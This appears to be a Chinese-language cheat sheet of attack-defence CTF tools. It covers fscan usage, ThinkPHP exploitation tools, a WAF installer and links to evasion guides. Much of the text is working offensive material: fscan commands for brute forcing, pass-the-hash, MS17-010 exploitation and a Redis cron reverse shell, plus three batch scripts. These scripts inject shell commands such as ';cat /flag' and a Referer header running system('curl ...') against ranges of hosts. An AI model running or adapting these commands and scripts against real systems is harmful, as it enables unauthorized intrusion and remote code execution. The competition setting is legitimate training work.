fscan(漏洞扫描)
下载
下载地址: Releases · shadow1ng/fscan · GitHub
把下载的文件放到指定文件目录里,
在文件的位置打开cmd
输入 fscan64.exe -h 192.168.1.1/24
ok了
接下来说说fscan的使用
使用
1.信息搜集:
-
存活探测(icmp)
-
端口扫描
2.爆破功能:
-
各类服务爆破(ssh、smb等)
-
数据库密码爆破(mysql、mssql、redis、psql等)
3.系统信息、漏洞扫描:
-
获取目标网卡信息
-
高危漏洞扫描(ms17010等)
4.Web探测功能:
-
webtitle探测
-
web指纹识别(常见cms、oa框架等)
-
web漏洞扫描(weblogic、st2等,支持xray的poc)
5.漏洞利用:
-
redis写公钥或写计划任务
-
ssh命令执行
6.其他功能:
-
文件保存
命令如下:
.\fscan64.exe -h 172.17.171.10 -p 1-65535
fscan.exe -h 192.168.1.1/24 (默认使用全部模块)
fscan.exe -h 192.168.1.1/16 (B段扫描)
fscan.exe -h 192.168.1.1/24 -np -no -nopoc(跳过存活检测 、不保存文件、跳过web poc扫描)
fscan.exe -h 192.168.1.1/24 -rf id_rsa.pub (redis 写公钥)
fscan.exe -h 192.168.1.1/24 -rs 192.168.1.1:6666 (redis 计划任务反弹shell)
fscan.exe -h 192.168.1.1/24 -c whoami (ssh 爆破成功后,命令执行)
fscan.exe -h 192.168.1.1/24 -m ssh -p 2222 (指定模块ssh和端口)
fscan.exe -h 192.168.1.1/24 -pwdf pwd.txt -userf users.txt (加载指定文件的用户名、密码来进行爆破)
fscan.exe -h 192.168.1.1/24 -o /tmp/1.txt (指定扫描结果保存路径,默认保存在当前路径)
fscan.exe -h 192.168.1.1/8 (A段的192.x.x.1和192.x.x.254,方便快速查看网段信息 )
fscan.exe -h 192.168.1.1/24 -m smb -pwd password (smb密码碰撞)
fscan.exe -h 192.168.1.1/24 -m ms17010 (指定模块)
fscan.exe -hf ip.txt (以文件导入)
fscan.exe -u http://baidu.com -proxy 8080 (扫描单个url,并设置http代理 http://127.0.0.1:8080)
fscan.exe -h 192.168.1.1/24 -nobr -nopoc (不进行爆破,不扫Web poc,以减少流量)
fscan.exe -h 192.168.1.1/24 -pa 3389 (在原基础上,加入3389->rdp扫描)
fscan.exe -h 192.168.1.1/24 -socks5 127.0.0.1:1080 (只支持简单tcp功能的代理,部分功能的库不支持设置代理)
fscan.exe -h 192.168.1.1/24 -m ms17010 -sc add (内置添加用户等功能,只适用于备选工具,更推荐其他ms17010的专项利用工具)
fscan.exe -h 192.168.1.1/24 -m smb2 -user admin -hash xxxxx (pth hash碰撞,xxxx:ntlmhash,如32ed87bdb5fdc5e9cba88547376818d4)
fscan.exe -h 192.168.1.1/24 -m wmiexec -user admin -pwd password -c xxxxx (wmiexec无回显命令执行)
Aazhen-V3.1
下载:GitHub - zangcc/Aazhen-RexHa: 自研JavaFX图形化漏洞扫描工具,支持扫描的漏洞分别是: ThinkPHP-2.x-RCE, ThinkPHP-5.0.23-RCE, ThinkPHP5.0.x-5.0.23通杀RCE, ThinkPHP5-SQL注入&敏感信息泄露, ThinkPHP 3.x 日志泄露NO.1, ThinkPHP 3.x 日志泄露NO.2, ThinkPHP 5.x 数据库信息泄露的漏洞检测,以及批量检测的功能。漏洞POC基本适用ThinkPHP全版本漏洞。
ThinkPHPGUI
下载:GitHub - Lotus6/ThinkphpGUI: Thinkphp(GUI)漏洞利用工具,支持各版本TP漏洞检测,命令执行,getshell。
Diffmerge(比较不同)
下载: SourceGear | DiffMerge
Windows版本不支持自定义安装目录,默认是:C\ProgramFiles\SourceGear\Common\DiffMerge\
D盾(扫描文件漏洞)
下载: D盾防火墙
D盾免杀:D盾安装使用及D盾免杀_d盾官网-CSDN博客
Seay(代码审计)
下载: GitHub - f1tz/cnseay: Seay源代码审计系统
watchbird(waf)
下载:Releases · leohearts/awd-watchbird · GitHub
将waf.so,watchbird.php文件存放在/var/www/html或其他目录中
确保当前用户对目标目录可写
执行php watchbird.php --install [Web目录], 安装器将输出安装了watchbird的文件路径
访问任意启用了waf的文件, 参数?watchbird=ui打开watchbird控制台, 创建一个初始密码
如需卸载, 请在相同的位置输入php watchbird.php --uninstall [Web目录], 如果您多次运行了安装,请多次运行卸载直到卸载器无输出
网站备份文件泄露扫描
地址:GitHub - sry309/ihoneyBakFileScan: 多进程批量网站备份文件泄露扫描工具v0.2
批量攻击提交flag脚本
import requests
def regeister():
url ='http://localhost:8801/index.php?c=User&a=register'
data = {
'username':'1234',
'password':'1234',
'sex':0,
'age':18
}
res = requests.post(url=url,data=data)
if res.status_code == 200:
print('注册成功')
else:
print('注册失败')
def login():
url1='http://localhost:8801/'
grame = {
'username':'1234',
'password':'1234',
}
res = requests.post(url=url1,data=grame)
if res.status_code==200:
print('登录成功')
else:
print('登录失败')
def usevu():
url2 = 'http://localhost:8801/index.php?c=User&a=ping'
data={
'host':';cat /flag'
}
res = requests.post(url=url2,data=data)
if res.status_code==200:
flag=res.text
print(flag)
return flag
else:
print('查找失败')
def submit(flags):
url = 'http://localhost:19999/api/flag'
headers={
"Content-Type": "application/json",
"Authorization": "e8b084904533203d71dbc24f6f2009c5"
}
flag=flags
data = {
"flag":flag
}
res = requests.post(url=url,json=data,headers=headers)
if res.status_code==200:
print('提交成功')
else:
print('提交失败')
if __name__=='__main__':
regeister()
login()
flags=usevu()
submit(flags=flags)
import requests
import re
path = '/WebApi/competitionCyberRange/static/base/#/competition/route/competiManage/competiAnswer' # 攻击路径
headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0',
'Accept': "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",
"Accept-Language": 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2',
'Accept-Encoding': 'gzip, deflate',
'Connection': 'close',
'Cookie': 'JSESSIONID=823B9BC42B2A423CD515CEAEC3ECCDAA'
}
data = {
'ip': '127.0.0.1|arp -a',
'Submit': 'Submit'
}
#flag提交地址
url_flag = 'http://10.0.0.1/submit.php?token=123456&flag='
#批量攻击和提交
def attack():
with open('urls.txt', 'r') as file:
for line in file:
url = line.strip() + path # 攻击url
ret = requests.post(url=url, headers=headers, data=data, timeout=10)
#print("Response:", ret.text) # 调试输出
flag_match = re.search(r'flag\{.+\}', ret.text)
if flag_match:
flag = flag_match.group()
print("Flag:", flag)
flag_url = url_flag + flag
#res = requests.post(url=flag_url,headers=headers,timeout=2) #注意这里的headers可能有问题,需要根据实际情况修改
print(res.text)
else:
print(line.strip() + " Flag not found")
attack()
import requests
for i in range(101, 200):
url = f"http://172.19.{i}.42/api/v1.token/test"
try:
headers = {'Referer': 'system("curl http://10.10.1.50:9028/competition/flagManager/getFlag");'}
req = requests.post(url, headers=headers)
print(f"172.19.{i}.42", end="-")
print(req.text)
except Exception as e:
print("next")
ehole(指纹识别)
下载: https://github.com/EdgeSecurityTeam/Ehole/releases
使用: .\EHole_windows_amd64.exe -u https://xxxxx
cms漏洞库:https://github.com/jayimu/vul_wiki
识别出来进行复现